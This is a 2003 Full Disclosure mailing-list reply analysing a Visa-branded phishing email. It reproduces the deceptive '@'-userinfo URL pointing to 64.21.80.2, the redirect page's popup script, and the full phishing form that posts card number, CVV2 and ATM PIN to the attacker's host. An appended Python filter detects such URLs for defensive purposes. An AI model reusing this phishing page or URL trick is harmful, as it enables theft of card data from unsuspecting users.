Full Disclosure mailing list archives
Re: visa XSS?
From: Gary Flynn <flynngn () jmu edu>
Date: Tue, 23 Dec 2003 09:29:53 -0500
Mauro Flores wrote:
I received this mail today; the funny stuff is that when you click on the link, you execute:

http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&useroption=SecurityUpdate&StateLevel=GetFrom@64.21.80.2/~gotier/verified_by_visa.htm

I don't have a Visa card and I don't like that 64.21.80.2, which is not a Visa IP, AFAIK. Anyone else receive it??

Yeah. We just got one here. I missed the first part of this thread so I don't know if I'm repeating stuff.

The original email came from an address registered in Korea.

Although the present web site redirects to the VISA site, if you look at the source you'll find:

<HTML><HEAD>
<TITLE>Secure with Visa</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1"><meta http-equiv='refresh' content='0; url=http://www.usa.visa.com/personal/privacy_policy/?it=ft_/personal/secure_with_visa/index.html'>
<BODY>
<script language="JavaScript">
<!--
// alert("popali");
window.name="spec";
window.open("http://64.21.80.2/~gotier/r.php", 'Visa', "resizable=no,scrollbars=no,width=425,height=198");
// window.focus();
//-->
</script>
</BODY></HTML>

And that r.php is a phish:

Please, enter your data info!<html>
<head>
<title>Enter your data</title>
</head>
<body>
<br>
<form method=post action=http://64.21.80.2/~gotier/r.php>
Credit Card No. <input type=text name=cc value=''><br>
CVV2 <input type=text name=cvv2 value=''><br>
PIN-ATM CODE: <input type=text name=pin value=''><br>
Expiration Date: month :
<select name=month>
<option value=01>01 <option value=02>02 <option value=03>03 <option value=04>04
<option value=05>05 <option value=06>06 <option value=07>07 <option value=08>08
<option value=09>09 <option value=10>10 <option value=11>11 <option value=12>12
</select>
year :
<select name=year>
<option value=2003>2003 <option value=2004>2004 <option value=2005>2005
<option value=2006>2006 <option value=2007>2007 <option value=2008>2008
<option value=2009>2009 <option value=2010>2010 <option value=2011>2011
<option value=2012>2012
</select>
<br><br>
<input type=submit value='Send');
</form>
</body>
</html>

--
Gary Flynn
Security Engineer - Technical Services
James Madison University

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
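The link quoted in this message puts www.visa.com in the userinfo part of the URL (the text before "@"), so the browser actually connects to 64.21.80.2. As an added example (not part of the original post or the list archive), a mail filter could flag such links as follows; the function names and the second sample URL are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
HOSTLIKE_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.IGNORECASE)

# Constructed sample: the link quoted in the message plus a benign URL
# (example.com is a placeholder) whose "@" sits in the query, not the authority.
SAMPLE = (
    "Update now: http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495"
    "&useroption=SecurityUpdate&StateLevel=GetFrom@64.21.80.2/~gotier/verified_by_visa.htm\n"
    "Help: http://www.example.com/contact?to=user@example.com\n"
)

def inspect_url(url):
    """Return a finding if the authority carries userinfo, else None."""
    parts = urlsplit(url)
    if "@" not in parts.netloc:
        return None  # an "@" in the path or query does not change the host
    userinfo = parts.netloc.rpartition("@")[0]
    decoy = userinfo.split(":", 1)[0]  # text the reader sees first
    host = parts.hostname or ""        # where the browser actually connects
    try:
        ipaddress.ip_address(host)
        host_is_ip = True
    except ValueError:
        host_is_ip = False
    return {
        "real_host": host,
        "decoy": decoy,
        "decoy_looks_like_host": bool(HOSTLIKE_RE.fullmatch(decoy)),
        "host_is_ip": host_is_ip,
    }

def scan_text(text):
    """Inspect every http(s) URL found in a message body."""
    findings = []
    for match in URL_RE.finditer(text):
        finding = inspect_url(match.group(0).rstrip(".,)>"))
        if finding:
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan_text(SAMPLE):
        print(f)
```

A finding where the decoy looks like a hostname and the real host is a bare IP address, as here, is a strong signal for quarantine or link rewriting.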